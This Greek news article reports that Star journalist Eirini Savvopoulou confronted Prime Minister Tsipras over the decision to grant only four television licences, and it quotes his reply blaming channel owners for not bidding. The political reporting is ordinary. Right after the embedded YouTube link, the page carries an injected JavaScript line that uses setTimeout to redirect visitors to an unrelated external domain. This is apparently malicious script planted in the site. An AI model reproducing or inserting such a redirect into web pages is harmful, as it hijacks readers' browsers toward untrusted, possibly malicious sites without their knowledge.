Σαββοπούλου (Star) στον Τσίπρα: Δεν μας κλείνει η κρίση, μας κλείνετε εσείς (ΒΙΝΤΕΟ)

0
8

 

Μετά την Ευαγγελία Τσικρίκα του Alpha και την ερώτησή της περί τηλεοπτικών αδειών στον Πρωθυπουργό σειρά πήρε η συνάδελφος Ειρήνη Σαββοπούλου του Star που επεσήμανε πως αν και ο σταθμός

που εργάζεται άντεξε στην κρίση, τώρα τον κλείνει η κυβέρνηση με τη απόφασή της για τις 4 τηλεοπτικές άδειες.

Αναλυτικά η κ. Σαββούλου ρώτησε: «Προς αποκατάσταση της αλήθειας, επειδή νωρίτερα μας βάλατε απέναντι από άλλους συναδέλφους περι κροκοδείλιων δακρύων για τους εργαζομένους και τις θέσεις εργασίας που έχουν χαθεί στον κλάδο. Εμάς δεν μας κλείνει η κρίση, εμείς αντέξαμε στην κρίση. Μας κλείνετε εσείς με την απόφασης σας για τις 4 άδειες. Για την ΕΡΤ να σας θυμίσω κάναμε αλλεπάλληλες απεργιακές κινητοποιήσεις.

Μιλήσατε για νταβατζιλίκια έχοντας απέναντί σας εν δυνάμεις άνεργους συναδέλφους κι άλλους τόσους που μας βλέπουν από την Αθήνα. Θέλω να εξηγήσετε στον ελληνικό λαό γιατί είπατε ότι το τζάμπα πέθανε, γιατί δεν λέτε πόσα χρήματα κατέβαλαν τόσα χρόνια τα κανάλια και πόσα θα χάσουν τώρα με τις ασφαλιστικές εισφορές, τη φορολογία, τα επιδοματα ανεργίας.  Για δώστε μας χρονοδιάγραμμα για την επόμενη ημέρα για παράδειγμα τη διέξοδο που θα μπορούσε να μας δοθεί με τις θεματικές άδεις,  που τη βάζετε στο απώτερο μέλλον κι αν αυτό το μέλλον θα είναι πριν ή μετά το μαύρο«.

Ο πρωθυπουργός στην απάντησή του επέρριψε ευθύνες στους ίδιους τους ιδιοκτήτες των καναλιών λέγοντας χαρακτηριστικά πως «αυτό πος σας κλείνει αν σας κλείσει είναι ότι οι ιδιοκτήτες σας κάνοντας επιχειρηματικό υπολογισμό δεν θέλησαν να μπουν και να αγοράσουν άδειες. Όσοι θέλησαν μπήκαν στον διαγωνισμό, έδωσαν προσφορές, πήραν άδειες. Ο διαγωνισμός έγινε με αδιάβλητο τρόπο. Ποιος μπορεί να μας κατηγορήσει;».

https://youtu.be/WDrm1gJSLys setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here